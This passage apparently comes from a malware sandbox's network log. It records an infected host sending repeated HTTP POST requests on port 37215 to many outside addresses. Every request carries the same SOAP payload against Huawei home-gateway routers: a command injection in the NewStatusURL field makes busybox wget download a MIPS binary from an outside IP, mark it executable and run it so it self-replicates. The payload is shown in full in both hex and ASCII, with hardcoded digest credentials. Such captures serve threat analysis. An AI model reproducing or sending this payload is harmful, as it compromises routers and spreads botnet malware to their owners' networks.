6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1397192.168.2.135486641.11.23.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560115099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1398192.168.2.1352920197.86.26.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560133934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1399192.168.2.135301641.87.243.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560141087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1400192.168.2.1356440171.224.7.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560156107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1401192.168.2.1336038197.160.10.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560178995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1402192.168.2.1350618137.0.84.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560199022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1403192.168.2.1341190197.13.93.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560772896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1404192.168.2.13485925.219.222.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560787916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1405192.168.2.133894825.69.167.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560816050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1406192.168.2.1345236197.252.65.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560825109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1407192.168.2.1359252197.50.218.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560842037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
